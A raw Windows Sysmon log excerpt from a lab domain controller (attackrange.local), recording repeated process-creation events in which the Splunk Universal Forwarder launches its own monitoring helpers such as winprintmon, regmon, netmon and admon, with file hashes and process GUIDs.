Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:22.872{A8622C2F-4DFE-6078-D106-00000000AE01}4940C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:21.678{A8622C2F-4DFD-6078-D006-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035449Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:21.003{A8622C2F-4DFD-6078-CF06-00000000AE01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035439Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:20.331{A8622C2F-4DFC-6078-CE06-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035430Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:18.405{A8622C2F-4DFA-6078-CD06-00000000AE01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035420Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:17.723{A8622C2F-4DF9-6078-CC06-00000000AE01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:17.055{A8622C2F-4DF9-6078-CB06-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035336Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:22.855{A8622C2F-4DC2-6078-CA06-00000000AE01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035321Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:21.661{A8622C2F-4DC1-6078-C906-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:20.995{A8622C2F-4DC0-6078-C806-00000000AE01}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035302Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:20.328{A8622C2F-4DC0-6078-C706-00000000AE01}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:18.404{A8622C2F-4DBE-6078-C606-00000000AE01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:17.722{A8622C2F-4DBD-6078-C506-00000000AE01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:17.055{A8622C2F-4DBD-6078-C406-00000000AE01}5084C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035182Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:22.856{A8622C2F-4D86-6078-C306-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035167Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:21.538{A8622C2F-4D85-6078-C206-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:20.862{A8622C2F-4D84-6078-C106-00000000AE01}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:20.303{A8622C2F-4D84-6078-C006-00000000AE01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035094Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:18.375{A8622C2F-4D82-6078-BF06-00000000AE01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035084Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:17.710{A8622C2F-4D81-6078-BE06-00000000AE01}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035075Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:28:17.035{A8622C2F-4D81-6078-BD06-00000000AE01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:22.850{A8622C2F-4D4A-6078-BC06-00000000AE01}2104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034972Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:21.579{A8622C2F-4D49-6078-BB06-00000000AE01}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:20.913{A8622C2F-4D48-6078-BA06-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034953Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:20.339{A8622C2F-4D48-6078-B906-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:18.426{A8622C2F-4D46-6078-B806-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:17.748{A8622C2F-4D45-6078-B706-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:27:17.082{A8622C2F-4D45-6078-B606-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034846Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:22.829{A8622C2F-4D0E-6078-B506-00000000AE01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:21.698{A8622C2F-4D0D-6078-B406-00000000AE01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:21.017{A8622C2F-4D0D-6078-B306-00000000AE01}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034804Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:20.412{A8622C2F-4D0C-6078-B206-00000000AE01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:18.407{A8622C2F-4D0A-6078-B106-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:26:17.746{A8622C2F-4D09-6078-B006-00000000AE01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 